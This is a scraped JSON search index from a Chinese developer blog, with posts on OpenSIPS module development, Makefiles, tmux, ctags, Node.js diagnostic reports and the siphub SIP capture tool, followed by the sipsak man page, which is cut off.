lzc_change(\u0026#34;abcd\u0026#34;,\u0026#34;desf\u0026#34;); } debug日志:从日志可以看出来lzc_change有两个参数,change_code_fix被调用了两次,每次调用可以获取参数的值,和参数的序号。\nDBG:core:fix_actions: fixing lzc_change, opensips.mf2.cfg:18 INFO:local_zone_code:change_code_fix: enter change_code_fix: param: abcd INFO:local_zone_code:change_code_fix: enter change_code_fix: param_no: 1 INFO:local_zone_code:change_code_fix: enter change_code_fix: local_zone_code: 0728 len:4 INFO:local_zone_code:change_code_fix: enter change_code_fix: param: desf INFO:local_zone_code:change_code_fix: enter change_code_fix: param_no: 2 INFO:local_zone_code:change_code_fix: enter change_code_fix: local_zone_code: 0728 len:4 ","permalink":"https://wdd.js.org/opensips/module-dev/l5/","summary":"module_exports 这个结构在每个模块中都有,这个有点类似js的export或者说是node.js的module.export。\n这是一个接口的规范。\n重要讲解几个关键点:\nlocal_zone_code是模块名字,这个是必需的 cmds表示在opensips脚本里可以有那些暴露的函数 params规定了模块的参数 mod_init在模块初始化的时候会被调用, 只会被调用一次 关于module_exports这个结构的定义,可以查阅:sr_module.h文件\nstruct module_exports exports= { \u0026#34;local_zone_code\u0026#34;, MOD_TYPE_DEFAULT,/* class of this module */ MODULE_VERSION, DEFAULT_DLFLAGS, /* dlopen flags */ 0, /* load function */ NULL, /* OpenSIPS module dependencies */ cmds, 0, params, 0, /* exported statistics */ 0, /* exported MI functions */ 0, /* exported pseudo-variables */ 0, /* exported transformations */ 0, /* extra processes */ 0, /* pre-init function */ mod_init, (response_function) 0, (destroy_function) 0, 0 /* per-child init function */ }; cmds struct cmd_export_ { char* name; /* opensips脚本里的函数名 */ cmd_function function; /* 关联的C代码里的函数 */ int param_no; /* 参数的个数 */ fixup_function fixup; /* 修正参数 */ free_fixup_function free_fixup; /* 修正参数的 */ int flags; /* 函数flag,主要是用来标记函数可以在哪些路由中使用 */ }; cmd_function","title":"概念理解 module_exports"},{"content":"Makefile ---src |___Makefile |___main.c 如何编写顶层的Makefiel, 使其进入到src中,执行src中的Makefile?\nrun: $(MAKE) -C src target a=1 b=2 ","permalink":"https://wdd.js.org/posts/2020/08/rudtng/","summary":"Makefile ---src |___Makefile |___main.c 如何编写顶层的Makefiel, 使其进入到src中,执行src中的Makefile?\nrun: $(MAKE) -C src target a=1 b=2 ","title":"统一入口Makefile"},{"content":"tmux使用场景 远程ssh连接到服务器,最难受的是随时有可能ssh掉线,然后一切都需要花额外的时间重新恢复,也有可能一些工作只能重新开始。\n在接续介绍tmux之前,先说说mosh。\n【mosh架构图】\n我曾使用过mosh, 据说mosh永远不会掉线。实际上有可能的确如此,但是mosh实际上安装比较麻烦。mosh需要在服务端安装server, 然后要在你本地的电脑上安装client, 然后通过这个client去连接mosh服务端的守护进程。mosh需要安装在客户端服务端都安装软件,然后可能还要设置一下网络策略,才能真正使用。\nmosh需要改变很多,这在生产环境是不可能的。另外即使是自己的开发环境,这样搞起来也是比较麻烦的。\n下图是tmux的架构图。实际上我们只需要在服务端安装tmux, 剩下的ssh的连接都可以用标准的功能。 【tmux架构图】\ntmux概念:sesssion, window, panes 概念不清楚,往往是觉得tmux难用的关键点。\nsession之间是相互隔离的,tmux可以启动多个session 一个session可以有多个window 一个window可以有多个panes 在tmux中按ctrl-b w, 可以在sesion,window和panel之间跳转。\n注意:默认情况下,一个sesion默认会打开一个window, 一个window会默认打开一个pane。\nsession操作 创建新的sesssion: tmux new -s some_name 脱离session: ctrl-b +d 注意即使脱离session, session中的内容还是在继续工作的 进入某个session: tmux attach -t some_name 查看sesion列表: tmux ls kill某个session: tmux kill-session -t some_name kill所有session: tmux kill-server 重命名session: ctrl-b $ 选择session: ctrl-b s window操作 新建: ctrl-b c 查看列表: ctrl-b w 关闭当前window: ctrl-b \u0026amp; 重命名当前window: ctrl-b , 切换到上一个window: ctrl-b p 切换到下一个window: ctrl-b n 按序号切换到制定的window: ctrl-b 数字 数字可以用0-9 panes操作 pane相当于分屏,所有pane都是在一个窗口里都显示出来的。这点和window不同,一个window显示出来,则意味着其他window是隐藏的。\n在做代码对比,或者一遍参考另一个代码,一遍写当前代码时,可以考虑使用pane分屏。\n垂直分屏: ctrl-b % 水平分屏: ctrl-b \u0026quot; 依次切换: ctrl-b o 按箭头键切换: ctrl-b 箭头 重新布局: ctrl-b 空格键 最大化当前pane: ctrl-b z 关闭当前pane: ctrl-b x 将panne转为新的window: ctrl-b ! 显示Pannel编号 ctrl-b q 向左移动pannel ctrl-b { 向右移动pannel ctrl-b } resize panne\nresize-pane -D 20 resize down resize-pane -U 20 resize up resize-pane -L 20 resize left resize-pane -R 20 resize right 杂项 查看时间: ctrl-b t 内部操作 当你已经进入tmux时,如何新建一个session或者关闭一个session呢?\n新建session ctrl-b : 进入命令行模式,然后输入: new -s session-name 关闭sesssion ctrl-b : 进入命令行模式,然后输入: kill-session -t session-name tmux 设置活跃window的状态栏背景色 # tmux 1.x set-window-option -g window-status-current-bg red # tmux 2.9 setw -g window-status-current-style fg=black,bg=white 参考 https://unix.stackexchange.com/questions/210174/set-the-active-tmux-tab-color ","permalink":"https://wdd.js.org/posts/2020/08/osz3gu/","summary":"tmux使用场景 远程ssh连接到服务器,最难受的是随时有可能ssh掉线,然后一切都需要花额外的时间重新恢复,也有可能一些工作只能重新开始。\n在接续介绍tmux之前,先说说mosh。\n【mosh架构图】\n我曾使用过mosh, 据说mosh永远不会掉线。实际上有可能的确如此,但是mosh实际上安装比较麻烦。mosh需要在服务端安装server, 然后要在你本地的电脑上安装client, 然后通过这个client去连接mosh服务端的守护进程。mosh需要安装在客户端服务端都安装软件,然后可能还要设置一下网络策略,才能真正使用。\nmosh需要改变很多,这在生产环境是不可能的。另外即使是自己的开发环境,这样搞起来也是比较麻烦的。\n下图是tmux的架构图。实际上我们只需要在服务端安装tmux, 剩下的ssh的连接都可以用标准的功能。 【tmux架构图】\ntmux概念:sesssion, window, panes 概念不清楚,往往是觉得tmux难用的关键点。\nsession之间是相互隔离的,tmux可以启动多个session 一个session可以有多个window 一个window可以有多个panes 在tmux中按ctrl-b w, 可以在sesion,window和panel之间跳转。\n注意:默认情况下,一个sesion默认会打开一个window, 一个window会默认打开一个pane。\nsession操作 创建新的sesssion: tmux new -s some_name 脱离session: ctrl-b +d 注意即使脱离session, session中的内容还是在继续工作的 进入某个session: tmux attach -t some_name 查看sesion列表: tmux ls kill某个session: tmux kill-session -t some_name kill所有session: tmux kill-server 重命名session: ctrl-b $ 选择session: ctrl-b s window操作 新建: ctrl-b c 查看列表: ctrl-b w 关闭当前window: ctrl-b \u0026amp; 重命名当前window: ctrl-b , 切换到上一个window: ctrl-b p 切换到下一个window: ctrl-b n 按序号切换到制定的window: ctrl-b 数字 数字可以用0-9 panes操作 pane相当于分屏,所有pane都是在一个窗口里都显示出来的。这点和window不同,一个window显示出来,则意味着其他window是隐藏的。","title":"tmux深度教学"},{"content":"关键技术 Docker: 容器 kuberneter:架构与部署 HELM: 打包和部署 Prometheus: 监控 Open TRACING + ZIPKIN : 分布式追踪 关键性能指标 I/O 性能: 启动耗时: 当服务出现故障,需要重启时,启动的速度越快,对客户的影响越小。 内存使用: ","permalink":"https://wdd.js.org/posts/2020/08/lrzu06/","summary":"关键技术 Docker: 容器 kuberneter:架构与部署 HELM: 打包和部署 Prometheus: 监控 Open TRACING + ZIPKIN : 分布式追踪 关键性能指标 I/O 性能: 启动耗时: 当服务出现故障,需要重启时,启动的速度越快,对客户的影响越小。 内存使用: ","title":"打造高可扩展性的微服务"},{"content":"在v11.7.0中加入实验性功能,诊断报告。诊断报告的输出是一个json文件,包括以下信息。\n进程信息 操作系统信息 堆栈信息 内存资源使用 libuv状态 环境变量 共享库 诊断报告的原始信息 如何产生诊断报告 必需使用 \u0026ndash;experimental-report 来启用 process.report.writeReport() 来输出诊断报告 node --experimental-report --diagnostic-report-filename=YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt --eval \u0026#34;process.report.writeReport(\u0026#39;report.json\u0026#39;)\u0026#34; Writing Node.js report to file: report.json Node.js report completed 用编辑器打开诊断报告,可以看到类似下面的内容。\n如何从诊断报告中分析问题? 诊断报告很长,不太好理解。IBM开发了report-toolkit工具,可以用来分析。 要求:node \u0026gt; 11.8.0\nnpm install report-toolkit --global 或者 yarn global add report-toolkit 查看帮助信息\nrtk --help 自动出发报告 node --experimental-report \\ --diagnostic-report-on-fatalerror \\ --diagnostic-report-uncaught-exception \\ index.js $ node –help grep report --experimental-report enable report generation 启用report功能 --diagnostic-report-on-fatalerror generate diagnostic report on fatal (internal) errors 产生报告当发生致命错误 --diagnostic-report-on-signal generate diagnostic report upon receiving signals 产生报告当收到信号 --diagnostic-report-signal=... causes diagnostic report to be produced on provided signal. Unsupported in Windows. (default: SIGUSR2) --diagnostic-report-uncaught-exception generate diagnostic report on uncaught exceptions 产生报告当出现未捕获的异常 --diagnostic-report-directory=... define custom report pathname. (default: current working directory of Node.js process) --diagnostic-report-filename=... define custom report file name. (default: YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt) 参考 https://nodejs.org/dist/latest-v12.x/docs/api/report.html https://ibm.github.io/report-toolkit/quick-start https://developer.ibm.com/technologies/node-js/articles/introducing-report-toolkit-for-nodejs-diagnostic-reports ","permalink":"https://wdd.js.org/fe/nodejs-report/","summary":"在v11.7.0中加入实验性功能,诊断报告。诊断报告的输出是一个json文件,包括以下信息。\n进程信息 操作系统信息 堆栈信息 内存资源使用 libuv状态 环境变量 共享库 诊断报告的原始信息 如何产生诊断报告 必需使用 \u0026ndash;experimental-report 来启用 process.report.writeReport() 来输出诊断报告 node --experimental-report --diagnostic-report-filename=YYYYMMDD.HHMMSS.PID.SEQUENCE#.txt --eval \u0026#34;process.report.writeReport(\u0026#39;report.json\u0026#39;)\u0026#34; Writing Node.js report to file: report.json Node.js report completed 用编辑器打开诊断报告,可以看到类似下面的内容。\n如何从诊断报告中分析问题? 诊断报告很长,不太好理解。IBM开发了report-toolkit工具,可以用来分析。 要求:node \u0026gt; 11.8.0\nnpm install report-toolkit --global 或者 yarn global add report-toolkit 查看帮助信息\nrtk --help 自动出发报告 node --experimental-report \\ --diagnostic-report-on-fatalerror \\ --diagnostic-report-uncaught-exception \\ index.js $ node –help grep report --experimental-report enable report generation 启用report功能 --diagnostic-report-on-fatalerror generate diagnostic report on fatal (internal) errors 产生报告当发生致命错误 --diagnostic-report-on-signal generate diagnostic report upon receiving signals 产生报告当收到信号 --diagnostic-report-signal=.","title":"Nodejs诊断报告"},{"content":"安装 # ubuntu or debian apt-get install ctags # centos yum install ctags # centos # macOSX brew install ctags 注意,如果在macOS 上输入ctags -R, 可能会有报错 /Library/Developer/CommandLineTools/usr/bin/ctags: illegal option -- R usage: ctags [-BFadtuwvx] [-f tagsfile] file ... 那么你可以输入which ctags: /usr/bin/ctags # 如果输出是这个,那么路径就是错的。正确的目录应该是/usr/local/bin/ctags 那么你可以在你的.zshrc或者其他配置文件中,增加一个alias alias ctags=\u0026#34;/usr/local/bin/ctags\u0026#34; 使用 进入到项目跟目录\nctags -R # 当前目录及其子目录生成ctags文件 进入vim vim main.c # :set tags=$PWD/tags #让vim读区当前文件下的ctags文件 # 在多个文件的场景下,最好用绝对路径设置tags文件的位置 # 否则有可能会报错neovim E433: No tags file 快捷键 Ctrl+] 跳转到标签定义的地方 Ctrl+o 跳到之前的地方 ctrl+t 回到跳转之前的标签处 :ptag some_key 打开新的面板预览some_key的定义 下一个定义处 上一个定义处 gd 当前函数内查找当前标识符的定义处 gD 当前文件查找标识符的第一次定义处 ","permalink":"https://wdd.js.org/posts/2020/08/ed6944/","summary":"安装 # ubuntu or debian apt-get install ctags # centos yum install ctags # centos # macOSX brew install ctags 注意,如果在macOS 上输入ctags -R, 可能会有报错 /Library/Developer/CommandLineTools/usr/bin/ctags: illegal option -- R usage: ctags [-BFadtuwvx] [-f tagsfile] file ... 那么你可以输入which ctags: /usr/bin/ctags # 如果输出是这个,那么路径就是错的。正确的目录应该是/usr/local/bin/ctags 那么你可以在你的.zshrc或者其他配置文件中,增加一个alias alias ctags=\u0026#34;/usr/local/bin/ctags\u0026#34; 使用 进入到项目跟目录\nctags -R # 当前目录及其子目录生成ctags文件 进入vim vim main.c # :set tags=$PWD/tags #让vim读区当前文件下的ctags文件 # 在多个文件的场景下,最好用绝对路径设置tags文件的位置 # 否则有可能会报错neovim E433: No tags file 快捷键 Ctrl+] 跳转到标签定义的地方 Ctrl+o 跳到之前的地方 ctrl+t 回到跳转之前的标签处 :ptag some_key 打开新的面板预览some_key的定义 下一个定义处 上一个定义处 gd 当前函数内查找当前标识符的定义处 gD 当前文件查找标识符的第一次定义处 ","title":"vim ctags安装及使用"},{"content":"o我写siphub的原因是homer太难用了!!经常查不到想查的数据,查询的速度也很慢。\n项目地址:https://github.com/wangduanduan/siphub\n架构 SIP服务器例如OpenSIPS或者FS可以通过hep协议将数据写到siphub, siphub将数据规整之后写入MySql, siphub同时也提供Web页面来查询和展示SIP消息。 功能介绍 sip-hub是一个专注sip信令的搜索以及时序图可视化展示的服务。\n相比于Homer, sip-hub做了大量的功能简化。同时也提供了一些个性化的查询,例如被叫后缀查询,仅域名查询等。\nsip-hub服务仅有3个页面\nsip消息搜索页面,用于按照主被叫、域名和时间范围搜索呼叫记录 时序图展示页面,用于展示SIP时序图和原始SIP消息 可以导入导出SIP消息 可以查找A-Leg 监控功能 大量简化搜索结果页面。siphub的搜索结果页面,每个callId相同的消息,只展示一条。 相关截图 搜索页面 siphub的搜索结果仅仅展示callId相同的最早的一条记录,这样就避免了像homer那种,看起来很多个消息,实际上都是属于一个INVITE的。 From字段和To字段都支持域名查询:@test.cc From字段也支持后缀查询,例如1234这种号码,可以只输入234就能查到,但是后缀要写完整,只查23是查不到的。 To字段仅仅支持精确查询 信令展示页面 点击对应的消息,详情也会自动跳转出来。 安装 首先需要安装MySql数据库,并在其中建立一个名为siphub的数据库 运行 dbHost 数据库地址 dbUser 数据库用户 dbName 数据库名 dataKeepDays 抓包保存天数 3000端口是web页面端口 9060是hep消息收取端口 docker run -d -p 3000:3000 -p 9060:9060/udp \\ --env NODE_ENV=production \\ --env dbHost=1.2.3.4 \\ --env dbUser=root \\ --env dbPwd=123456 \\ --env dbName=siphub \\ --env dataKeepDays=3 \\ --name siphub wangduanduan/siphub 集成 OpenSIPS集成 test witch OpenSIPS 2.4\n# add hep listen listen=hep_udp:your_ip:9061 loadmodule \u0026#34;proto_hep.so\u0026#34; # replace SIP_HUB_IP_PORT with siphub‘s ip:port modparam(\u0026#34;proto_hep\u0026#34;, \u0026#34;hep_id\u0026#34;,\u0026#34;[hep_dst] SIP_HUB_IP_PORT;transport=udp;version=3\u0026#34;) loadmodule \u0026#34;siptrace.so\u0026#34; modparam(\u0026#34;siptrace\u0026#34;, \u0026#34;trace_id\u0026#34;,\u0026#34;[tid]uri=hep:hep_dst\u0026#34;) # add ite in request route(); if(!is_method(\u0026#34;REGISTER\u0026#34;) \u0026amp;\u0026amp; !has_totag()){ sip_trace(\u0026#34;tid\u0026#34;, \u0026#34;d\u0026#34;, \u0026#34;sip\u0026#34;); } FreeSWITCH集成 fs version 版本要高于 1.6.8+\n编辑: sofia.conf.xml\n用真实的siphub ip:port替换SIP_HUB_IP_PORT\n\u0026lt;param name=\u0026#34;capture-server\u0026#34; value=\u0026#34;udp:SIP_HUB_IP_PORT\u0026#34;/\u0026gt; freeswitch@fsnode04\u0026gt; sofia global capture on +OK Global capture on freeswitch@fsnode04\u0026gt; sofia global capture off +OK Global capture off 注意:sip_profiles里面的也要设置为yes\nsip_profiles/internal.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; sip_profiles/external-ipv6.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; sip_profiles/external.xml \u0026lt;param name=\u0026#34;sip-capture\u0026#34; value=\u0026#34;yes\u0026#34;/\u0026gt; ","permalink":"https://wdd.js.org/opensips/tools/siphub/","summary":"o我写siphub的原因是homer太难用了!!经常查不到想查的数据,查询的速度也很慢。\n项目地址:https://github.com/wangduanduan/siphub\n架构 SIP服务器例如OpenSIPS或者FS可以通过hep协议将数据写到siphub, siphub将数据规整之后写入MySql, siphub同时也提供Web页面来查询和展示SIP消息。 功能介绍 sip-hub是一个专注sip信令的搜索以及时序图可视化展示的服务。\n相比于Homer, sip-hub做了大量的功能简化。同时也提供了一些个性化的查询,例如被叫后缀查询,仅域名查询等。\nsip-hub服务仅有3个页面\nsip消息搜索页面,用于按照主被叫、域名和时间范围搜索呼叫记录 时序图展示页面,用于展示SIP时序图和原始SIP消息 可以导入导出SIP消息 可以查找A-Leg 监控功能 大量简化搜索结果页面。siphub的搜索结果页面,每个callId相同的消息,只展示一条。 相关截图 搜索页面 siphub的搜索结果仅仅展示callId相同的最早的一条记录,这样就避免了像homer那种,看起来很多个消息,实际上都是属于一个INVITE的。 From字段和To字段都支持域名查询:@test.cc From字段也支持后缀查询,例如1234这种号码,可以只输入234就能查到,但是后缀要写完整,只查23是查不到的。 To字段仅仅支持精确查询 信令展示页面 点击对应的消息,详情也会自动跳转出来。 安装 首先需要安装MySql数据库,并在其中建立一个名为siphub的数据库 运行 dbHost 数据库地址 dbUser 数据库用户 dbName 数据库名 dataKeepDays 抓包保存天数 3000端口是web页面端口 9060是hep消息收取端口 docker run -d -p 3000:3000 -p 9060:9060/udp \\ --env NODE_ENV=production \\ --env dbHost=1.2.3.4 \\ --env dbUser=root \\ --env dbPwd=123456 \\ --env dbName=siphub \\ --env dataKeepDays=3 \\ --name siphub wangduanduan/siphub 集成 OpenSIPS集成 test witch OpenSIPS 2.","title":"siphub 轻量级实时SIP信令收包的服务"},{"content":"sipsak is a command line tool which can send simple requests to a SIP server. It can run additional tests on a SIP server which are usefull for admins and developers of SIP enviroments.\nhttps://github.com/nils-ohlmeier/sipsak\n安装 apt-get install sipsak 发送options sipsak -vv -p 192.168.2.63:5060 -s sip:8001@test.cc man SIPSAK(1) User Manuals SIPSAK(1) NAME sipsak - a utility for various tests on sip servers and user agents SYNOPSIS sipsak [-dFGhiILnNMRSTUVvwz] [-a PASSWORD ] [-b NUMBER ] [-c SIPURI ] [-C SIPURI ] [-D NUMBER ] [-e NUMBER ] [-E STRING ] [-f FILE ] [-g STRING ] [-H HOSTNAME ] [-j STRING ] [-J STRING ] [-l PORT ] [-m NUMBER ] [-o NUMBER ] [-p HOSTNAME ] [-P NUMBER ] [-q REGEXP ] [-r PORT ] [-t NUMBER ] [-u STRING ] [-W NUMBER ] [-x NUMBER ] -s SIPURI DESCRIPTION sipsak is a SIP stress and diagnostics utility. It sends SIP requests to the server within the sip-uri and examines received responses. It runs in one of the following modes: - default mode A SIP message is sent to destination in sip-uri and reply status is displayed. The request is either taken from filename or generated as a new OPTIONS message. - traceroute mode (-T) This mode is useful for learning request\u0026#39;s path. It operates similarly to IP-layer utility traceroute(8). - message mode (-M) Sends a short message (similar to SMS from the mobile phones) to a given target. With the option -B the content of the MESSAGE can be set. Useful might be the options -c and -O in this mode. - usrloc mode (-U) Stress mode for SIP registrar. sipsak keeps registering to a SIP server at high pace. Additionally the registrar can be stressed with the -I or the -M option. If -I and -M are omitted sipsak can be used to register any given contact (with the -C option) for an account at a registrar and to query the current bindings for an account at a registrar. - randtrash mode (-R) Parser torture mode. sipsak keeps sending randomly corrupted messages to torture a SIP server\u0026#39;s parser. - flood mode (-F) Stress mode for SIP servers. sipsak keeps sending requests to a SIP server at high pace. If libruli (http://www.nongnu.org/ruli/) or c-ares (http://daniel.haxx.se/projects/c-ares/) support is compiled into the sipsak binary, then first a SRV lookup for _sip._tcp.hostname is made. If that fails a SRV lookup for _sip._udp.hostname is made. And if this lookup fails a normal A lookup is made. If a port was given in the target URI the SRV lookup is omitted. Failover, load distribution and other transports are not supported yet. OPTIONS -a, --password PASSWORD With the given PASSWORD an authentication will be tryed on received \u0026#39;401 Unauthorized\u0026#39;. Authorization will be tryed on time. If this option is omitted an authorization with an empty password (\u0026#34;\u0026#34;) will be tryed. If the password is equal to - the password will be read from the standard input (e.g. the keyboard). This prevents other users on the same host from seeing the password the password in the process list. NOTE: the password still can be read from the memory if other users have access to it. -A, --timing prints only the timing values of the test run if verbosity is zero because no -v was given. If one or more -v were given this option will be ignored. -b, --apendix-begin NUMBER The starting number which is appended to the user name in the usrloc mode. This NUMBER is increased until it reaches the value given by the -e parameter. If omitted the starting number will be one. -B, --message-body STRING The given STRING will be used as the body for outgoing MESSAGE requests. -c, --from SIPURI The given SIPURI will be used in the From header if sipsak runs in the message mode (initiated with the -M option). This is helpful to present the receiver of a MESSAGE a meaningfull and usable address to where maybe even responses can be send. -C, --contact SIPURI This is the content of the Contact header in the usrloc mode. This allows to insert forwards like for mail. For example you can insert the uri of your first SIP account at a second account, thus all calls to the second account will be for‐ warded to the first account. As the argument to this option will not be enclosed in brackets you can give also multiple contacts in the raw format as comma separated list. The special words empty or none will result in no contact header in the REGISTER request and thus the server should answer with the current bindings for the account at the registrar. The special words * or star will result in Contact header containing just a star, e.g. to remove all bindings by using expires value 0 together with this Contact. -d, --ignore-redirects If this option is set all redirects will be ignored. By default without this option received redirects will be respected. This option is automatically activated in the randtrash mode and in the flood mode. -D, --timeout-factor NUMBER The SIP_T1 timer is getting multiplied with the given NUMBER. After receiving a provisional response for an INVITE request, or when a reliable transport like TCP or TLS is used sipsak waits for the resulting amount of time for a final response until it gives up. -e, --appendix-end NUMBER The ending number which is appended to the user name in the usrloc mode. This number is increased until it reaches this ending number. In the flood mode this is the maximum number of messages which will be send. If omitted the default value is 2^31 (2147483647) in the flood mode. -E, --transport STRING The value of STRING will be used as IP transport for sending and receiving requests and responses. This option over‐ writes any result from the URI evaluation and SRV lookup. Currently only \u0026#39;udp\u0026#39; and \u0026#39;tcp\u0026#39; are accepted as value for STRING. -f, --filename FILE The content of FILE will be read in in binary mode and will be used as replacement for the alternatively created sip mes‐ sage. This can used in the default mode to make other requests than OPTIONS requests (e.g. INVITE). By default missing carriage returns in front of line feeds will be inserted (use -L to de-activate this function). If the filename is equal to - the file is read from standard input, e.g. from the keyboard or a pipe. Please note that the manipulation functions (e.g. inserting Via header) are only tested with RFC conform requests. Additionally special strings within the file can be replaced with some local or given values (see -g and -G for details). -F, --flood-mode This options activates the flood mode. In this mode OPTIONS requests with increasing CSeq numbers are sent to the server. Replies are ignored -- source port 9 (discard) of localhost is advertised in topmost Via. -h, --help Prints out a simple usage help message. If the long option --help is available it will print out a help message with the available long options. -g, --replace-string STRING Activates the replacement of $replace$ within the request (usually read in from a file) with the STRING. Alternatively you can also specify a list of attribute and values. This list has to start and end with a non alpha-numeric character. The same character has to be used also as separator between the attribute and the value and between new further attribute value pairs. The string \u0026#34;$attribute$\u0026#34; will be replaced with the value string in the message. -G, --replace Activates the automatic replacement of the following variables in the request (usually read in from a file): $dsthost$ will be replaced by with the host or domainname which is given by the -s parameter. $srchost$ will be replaced by the hostname of the local machine. $port$ will be replaced by the local listening port of sipsak. $user$ will be replaced by the username which is given by the -s parameter. -H, --hostname HOSTNAME Overwrites the automatic detection of the hostname with the given parameter. Warning: use this with caution (preferable only if the automatic detection fails). -i, --no-via Deactivates the insertion of the Via line of the localhost. Warning: this probably disables the receiving of the responses from the server. -I, --invite-mode Activates the Invites cycles within the usrloc mode. It should be combined with -U. In this combination sipsak first registeres a user, and then simulates an invitation to this user. First an Invite is sent, this is replied with 200 OK and finally an ACK is sent. This option can also be used without -U , but you should be sure to NOT invite real UAs with this option. In the case of a missing -U the -l PORT is required because only if you made a -U run with a fixed local port before, a run with -I and the same fixed local port can be successful. Warning: sipsak is no real UA and invita‐ tions to real UAs can result in unexpected behaivior. -j, --headers STRING The string will be added as one or more additional headers to the request. The string \u0026#34;\\n\u0026#34; (note: two characters) will be replaced with CRLF and thus result in two separate headers. That way more then one header can be added. -J, --autohash STRING The string will be used as the H(A1) input to the digest authentication response calculation. Thus no password from the -a option is required if this option is provided. The given string is expected to be a hex string with the length of the used hash function. -k, --local-ip STRING The local ip address to be used -l, --local-port PORT The receiving UDP socket will use the local network port. Useful if a file is given by -f which contains a correct Via line. Check the -S option for details how sipsak sends and receives messages. -L, --no-crlf De-activates the insertion of carriage returns (\\r) before all line feeds (\\n) (which is not already proceeded by car‐ raige return) if the input is coming from a file ( -f ). Without this option also an empty line will be appended to the request if required. -m, --max-forwards NUMBER This sets the value of the Max-Forward header field. If omitted no Max-Forward field will be inserted. If omitted in the traceroute mode number will be 255. -M, --message-mode This activates the Messages cycles within the usrloc mode (known from sipsak versions pre 0.8.0 within the normal usrloc test). This option should be combined with -U so that a successful registration will be tested with a test message to the user and replied with 200 OK. But this option can also be used without the -U option. Warning: using without -U can cause unexpected behaivor. -n, --numeric Instead of the full qualified domain name in the Via line the IP of the local host will be used. This option is now on by default. -N, --nagios-code Use Nagios comliant return codes instead of the normal sipsak ones. This means sipsak will return 0 if everything was ok and 2 in case of any error (local or remote). -o, --sleep NUMBER sipsak will sleep for NUMBER ms before it starts the next cycle in the usrloc mode. This will slow down the whole test process to be more realistic. Each cycle will be still completed as fast as possible, but the whole test will be slowed down. -O, --disposition STRING The given STRING will be used as the content for the Content-Disposition header. Without this option there will be no Content-Disposition header in the request. -p, --outbound-proxy HOSTNAME[:PORT] the address of the hostname is the target where the request will be sent to (outgoing proxy). Use this if the destination host is different then the host part of the request uri. The hostname is resolved via DNS SRV if supported (see descrip‐ tion for SRV resolving) and no port is given. -P, --processes NUMBER Start NUMBER of processes in parallel to do the send and reply checking. Only makes sense if a higher number for -e is given in the usrloc, message or invite mode. -q, --search REGEXP match replies against REGEXP and return false if no match occurred. Useful for example to detect server name in Server header field. -r, --remote-port PORT Instead of the default sip port 5060 the PORT will be used. Alternatively the remote port can be given within the sip uri of the -s parameter. -R, --random-mode This activates the randtrash mode. In this mode OPTIONS requests will be send to server with increasing numbers of ran‐ domly crashed characters within this request. The position within the request and the replacing character are randomly chosen. Any other response than Bad request (4xx) will stop this mode. Also three unresponded sends will stop this mode. With the -t parameter the maximum of trashed characters can be given. -s, --sip-uri SIPURI This mandatory option sets the destination of the request. It depends on the mode if only the server name or also an user name is mandatory. Example for a full SIPURI : sip:test@foo.bar:123 See the note in the description part about SRV lookups for details how the hostname of this URI is converted into an IP and port. -S, --symmetric With this option sipsak will use only one port for sending and receiving messages. With this option the local port for sending will be the value from the -l option. In the default mode sipsak sends from a random port and listens on the given port from the -l option. Note: With this option sipsak will not be able to receive replies from servers with asym‐ metric signaling (and broken rport implementation) like the Cisco proxy. If you run sipsak as root and with raw socket support (check the output from the -V option) then this option is not required because in this case sipsak already uses only one port for sending and receiving messages. -t, --trash-chars NUMBER This parameter specifies the maximum of trashed characters in the randtrash mode. If omitted NUMBER will be set to the length of the request. -T, --traceroute-mode This activates the traceroute mode. This mode works like the well known traceroute(8) command expect that not the number of network hops are counted rather the number of server on the way to the destination user. Also the round trip time of each request is printed out, but due to a limitation within the sip protocol the identity (IP or name) can only deter‐ mined and printed out if the response from the server contains a warning header field. In this mode on each outgoing request the value of the Max-Forwards header field is increased, starting with one. The maximum of the Max-Forwards header will 255 if no other value is given by the -m parameter. Any other response than 483 or 1xx are treated as a final response and will terminate this mode. -u, --auth-username STRING Use the given STRING as username value for the authentication (different account and authentication username). -U, --usrloc-mode This activates the usrloc mode. Without the -I or the -M option, this only registers users at a registrar. With one of the above options the previous registered user will also be probed ether with a simulated call flow (invite, 200, ack) or with an instant message (message, 200). One password for all users accounts within the usrloc test can be given with the -a option. An user name is mandatory for this mode in the -s parameter. The number starting from the -b parameter to the -e parameter is appended the user name. If the -b and the -e parameter are omitted, only one runs with the given user‐ name, but without append number to the usernames is done. -v, --verbose This parameter increases the output verbosity. No -v means nearly no output except in traceroute and error messages. The maximum of three v\u0026#39;s prints out the content of all packets received and sent. -V, --version Prints out the name and version number of sipsak and the options which were compiled into the binary. -w, --extract-ip Activates the extraction of the IP or hostname from the Warning header field. -W, --nagios-warn NUMBER Return Nagios warn exit code (1) if the number of retransmissions before success was above the given number. -x, --expires NUMBER Sets the value of the Expires header to the given number. -z, --remove-bindings Activates the randomly removing of old bindings in the usrloc mode. How many per cent of the bindings will be removed, is determined by the USRLOC_REMOVE_PERCENT define within the code (set it before compilation). Multiple removing of bind‐ ings is possible, and cannot be prevented. -Z, --timer-t1 Sets the amount of milliseconds for the SIP timer T1. It determines the length of the gaps between two retransmissions of a request on a unreliable transport. Default value is 500 if not changed via the configure option --enable-timeout. RETURN VALUES The return value 0 means that a 200 was received. 1 means something else then 1xx or 2xx was received. 2 will be returned on local errors like non resolvable names or wrong options combination. 3 will be returned on remote errors like socket errors (e.g. icmp error), redirects without a contact header or simply no answer (timeout). If the -N option was given the return code will be 2 in case of any (local or remote) error. 1 in case there have been retrans‐ missions from sipsak to the server. And 0 if there was no error at all. CAUTION Use sipsak responsibly. Running it in any of the stress modes puts substantial burden on network and server under test. EXAMPLES sipsak -vv -s sip:nobody@foo.bar displays received replies. sipsak -T -s sip:nobody@foo.bar traces SIP path to nobody. sipsak -U -C sip:me@home -x 3600 -a password -s sip:myself@company inserts forwarding from work to home for one hour. sipsak -f bye.sip -g \u0026#39;!FTAG!345.af23!TTAG!1208.12!\u0026#39; -s sip:myproxy reads the file bye.sip, replaces $FTAG$ with 345.af23 and $TTAG$ with 1208.12 and finally send this message to myproxy LIMITATIONS / NOT IMPLEMENTED Many servers may decide NOT to include SIP \u0026#34;Warning\u0026#34; header fields. Unfortunately, this makes displaying IP addresses of SIP servers in traceroute mode impossible. IPv6 is not supported. Missing support for the Record-Route and Route header. BUGS sipsak is only tested against the SIP Express Router (ser) though their could 